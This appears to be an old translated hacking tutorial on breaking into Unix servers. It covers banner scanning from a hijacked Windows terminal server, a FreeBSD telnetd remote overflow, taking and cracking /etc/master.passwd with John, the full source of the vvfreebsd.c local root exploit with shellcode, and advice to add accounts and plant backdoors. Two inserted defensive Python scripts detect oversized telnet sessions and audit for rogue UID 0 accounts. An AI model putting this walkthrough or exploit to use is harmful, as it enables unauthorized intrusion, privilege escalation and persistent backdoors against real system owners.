How to find a Unix vulnerability server (figure)

Source: Internet
Author: User

Why am I hunting for vulnerable servers with x-laser? Because all of our operations are carried out from the port-3389 (terminal server) host we already hold. First, everyone logs on to the same terminal server (the prerequisite is that the machine has been opened up to us by someone else and is not your own, so that Terminal Services Manager is available); then, in Administrative Tools, use Terminal Services Manager to switch sessions (pick the user session you want to connect to).

That way two people can take over each other's session and every action is visible to both. The method works well, greatly improves efficiency and makes the intrusion more enjoyable; we recommend that you spread it :)
Now to work. Since we are using Windows against Unix-class systems, we had better have exploits that run on Windows in order to take our first Unix server. You can compile Unix exploits for Windows with cygwin (see www.isfocus.com), or download ready-made ones from e4gle.org (the e homepage) or www.cnhonker.net/old.php. Note that you must download the cygwin1.dll file along with them.
What we need now is a large number of Unix servers, and then their vulnerabilities. But how do we find them? Here we call on our mongoard network plugin: after a quick setup, let it run and start scanning.

In the results we can see a FreeBSD host, a good target because of the telnetd remote overflow vulnerability that was widely used some time ago. We can also use SuperScan to quickly determine the operating system: scan port 23, because telnet normally shows a banner, and the banner tells us the operating system type.

The scan also found two Linux servers; the banner "..... ... #..." (shown in the figure) is the Linux identifier,
and "........ #..." is the SunOS one. Once you have used these systems you recognize them from experience.

Back to our FreeBSD host: after fetching bsd.exe and cygwin1.dll from the cnhonker site (the "red league"), we ran the overflow.

Because we have to send 16 MB of data, it can take a little while.
Once the command succeeds we get a shell prompt.
Here we type id.
You can see that we have become root. Of course, we can also grab the shadow file now.
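From the defender's side, the volume described above (16 MB pushed into a single telnet session, where an interactive login is a few kilobytes of keystrokes) is itself a detectable signal. The following is an added example, not code from the original article: it reads constructed flow-style records (the five-column layout "timestamp src dst dport bytes_in" is an assumption for this example, not a real product's log format) and flags 23/tcp sessions whose inbound byte count is far beyond interactive use.

```python
import re
from dataclasses import dataclass

# Constructed sample records (timestamp src dst dport bytes_in); the layout is an
# assumption for this example, not the output of any real sensor.
SAMPLE_LOG = """\
2001-08-01T10:00:01 10.0.0.5 192.168.1.20 23 412
2001-08-01T10:03:17 10.0.0.9 192.168.1.20 23 17301504
2001-08-01T10:04:02 10.0.0.5 192.168.1.21 22 9812
2001-08-01T10:05:40 10.0.0.7 192.168.1.22 23 16777216
2001-08-01T10:06:00 10.0.0.5 192.168.1.20 80 5242880
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d+) (\d+)$")


@dataclass(frozen=True)
class Alert:
    ts: str
    src: str
    dst: str
    bytes_in: int


def parse(lines):
    """Yield (ts, src, dst, dport, bytes_in) tuples; malformed lines are skipped
    so that one bad record does not abort the whole scan."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src, dst, dport, nbytes = m.groups()
        yield ts, src, dst, int(dport), int(nbytes)


def oversized_telnet_sessions(lines, threshold=1 << 20):
    """Return an Alert for every telnet (23/tcp) session whose inbound byte
    count is at or above threshold (default 1 MiB). Megabytes of client->server
    data on a telnet port matches the profile of the overflow described above;
    large transfers on other ports (HTTP, SSH) are deliberately not flagged here."""
    return [
        Alert(ts, src, dst, n)
        for ts, src, dst, dport, n in parse(lines)
        if dport == 23 and n >= threshold
    ]


if __name__ == "__main__":
    for a in oversized_telnet_sessions(SAMPLE_LOG.splitlines()):
        print(f"{a.ts} {a.src} -> {a.dst} telnet inbound {a.bytes_in} bytes")
```

The threshold is conservative on purpose: a 1 MiB inbound telnet session is already two orders of magnitude above what a human types, so the rule produces few false positives even on busy hosts.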
The shadow file is /etc/master.passwd. Run John against it to recover a user name and password (a Windows build of John, also compiled with cygwin, can be downloaded from www.xfocus.net), then telnet in with that ordinary account (the root password is usually too hard to crack) and run a local overflow. Why go to this trouble? Many remote shells do not echo output, so adding an account from them is awkward. On BSD an account is normally added by running /usr/sbin/adduser and following the prompts. The BSD system is very stable, and many large sites use it, such as hongmeng. I will paste the local overflow code here.

Affected versions: FreeBSD 4.3, 4.2, 4.1, 4.0

Earlier versions may also be affected.

Test program usage:

netdemon% gcc -o vvbsd vvbsd.c
netdemon% cp /bin/sh /tmp
netdemon% ./vvbsd
vvfreebsd. written by Georgi Guninski
shall jump to bfbffe71
child = 61056
login: # done
#

FreeBSD 4.3 was found to have a design vulnerability that allows a user to insert signal handlers into other processes.

The problem lies in rfork(RFPROC | RFSIGSHARE). If the child process exec()s a setuid program and the parent process then installs a signal handler, the handler is shared with (copied into) the child. Sending that signal to the child causes the handler to execute inside the setuid process. An attacker can exploit this to obtain root privileges. The code is vvfreebsd.c:

/* FreeBSD 4.3 local root exploit using shared signals. Written by Georgi Guninski */
/* The header names were lost in extraction; these are the ones the code needs. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>

char *vv1;               /* address of the shellcode copy found in the environment */
#define MYSIG SIGINT

// exec "/tmp/sh", shellcode gotten from the internet and modified
unsigned char bsdshell[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x31\xc0\x50\x50\xb0\xb7\xcd\x80"
    "\x31\xc0\x50\x50\xb0\x17\xcd\x80"
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
    "\x74\x6d\x89\xe3\x50\x53\x50\x54\x53"
    "\xb0\x3b\x50\xcd\x80\x90\x90\x90";

typedef void (*PROG)(void);
extern char **environ;

int main(int ac, char **av)
{
    int pid;

    // (*(PROG)bsdshell)();

    /* First run: put the shellcode into the environment and re-exec ourselves,
       so that the second run finds it at a stable address through getenv(). */
    if (!(vv1 = getenv("vv"))) {
        setenv("vv", (char *)bsdshell, 1);
        /* exec only returns on failure (-1); the original test was inverted */
        if (execle(av[0], "vv", NULL, environ) < 0) {
            perror("weird exec");
            exit(1);
        }
    }
    printf("vvfreebsd. written by Georgi Guninski\n");
    printf("shall jump to %x\n", (unsigned int)(size_t)vv1);

    /* The child shares its signal handler table with the parent (RFSIGSHARE)
       and then execs a setuid program. */
    if (!(pid = rfork(RFPROC | RFSIGSHARE))) {
        printf("child = %d\n", getpid());
        // /usr/bin/login and rlogin work for me. ping gives nonsuid shell
        // if (execl("/usr/bin/rlogin", "rlogin", "localhost", (char *)0) < 0)
        if (execl("/usr/bin/login", "login", (char *)0) < 0) {
            perror("exec setuid failed");
            exit(2);
        }
    }
    sleep(2);
    /* Installing the handler in the parent also installs it in the setuid child. */
    signal(MYSIG, (sig_t)vv1);
    sleep(2);
    kill(pid, MYSIG);
    printf("done\n");
    while (42);
}

/* Extreme Network Security Group */


Find a writable directory, then:

cat > vv.c        (press Enter, then right-click to paste the code)
Ctrl+D            (save)
gcc -o vv vv.c    (compile; on Solaris and AIX the compiler is called cc)
cp /bin/csh /tmp
./vv

That gives you root. Note that the cp step is required by the code.
Then run adduser and plant a bunch of backdoors.
Some supplements: 1. Use the w command to see who is currently logged in; be careful if you see root.
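The counterpart to "adduser and plant a bunch of backdoors" on the administrator's side is a periodic audit of the account database against a known-good copy. The following is an added example, not code from the original article: it parses records in FreeBSD master.passwd layout (name:pw:uid:gid:class:change:expire:gecos:home:shell), reports accounts that were added, removed or altered relative to a baseline, and lists every UID 0 account other than the stock root and toor. All records here are constructed sample data.

```python
from dataclasses import dataclass

# Constructed records in FreeBSD master.passwd layout
# (name:pw:uid:gid:class:change:expire:gecos:home:shell); not taken from a real host.
BASELINE_PASSWD = """\
root:*:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/sbin/nologin
alice:*:1001:1001::0:0:Alice:/home/alice:/bin/sh
"""

# Same host later: two new accounts, and the www service account has been
# given UID 0 and a login shell.
CURRENT_PASSWD = """\
root:*:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
www:*:0:80::0:0:World Wide Web Owner:/nonexistent:/bin/sh
alice:*:1001:1001::0:0:Alice:/home/alice:/bin/sh
bob:*:1002:1002::0:0:Bob:/home/bob:/bin/sh
admin2:*:0:0::0:0:backup admin:/tmp:/bin/csh
"""

# Accounts that legitimately hold UID 0 on a stock FreeBSD install.
KNOWN_UID0 = {"root", "toor"}


@dataclass(frozen=True)
class Account:
    name: str
    uid: int
    gid: int
    home: str
    shell: str


def parse_master_passwd(text):
    """Parse master.passwd text into {name: Account}; comments and malformed
    lines (wrong field count) are skipped rather than aborting the audit."""
    accounts = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 10:
            continue
        name, _pw, uid, gid, _cls, _chg, _exp, _gecos, home, shell = fields
        accounts[name] = Account(name, int(uid), int(gid), home, shell)
    return accounts


def unexpected_uid0(accounts):
    """Names of UID 0 accounts that are not on the allow list."""
    return sorted(a.name for a in accounts.values()
                  if a.uid == 0 and a.name not in KNOWN_UID0)


def diff_accounts(baseline, current):
    """Compare two parsed databases; 'changed' catches edits such as a service
    account being re-pointed at UID 0 or given a shell."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(n for n in set(baseline) & set(current)
                     if baseline[n] != current[n])
    return {"added": added, "removed": removed, "changed": changed}


def audit(baseline_text, current_text):
    baseline = parse_master_passwd(baseline_text)
    current = parse_master_passwd(current_text)
    report = diff_accounts(baseline, current)
    report["unexpected_uid0"] = unexpected_uid0(current)
    return report


if __name__ == "__main__":
    for key, names in audit(BASELINE_PASSWD, CURRENT_PASSWD).items():
        print(f"{key}: {', '.join(names) or '-'}")
```

In practice the baseline copy is stored off the host (or under an integrity checker), since a backdoored account is useless to the intruder only if the comparison runs against a copy they could not also edit.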
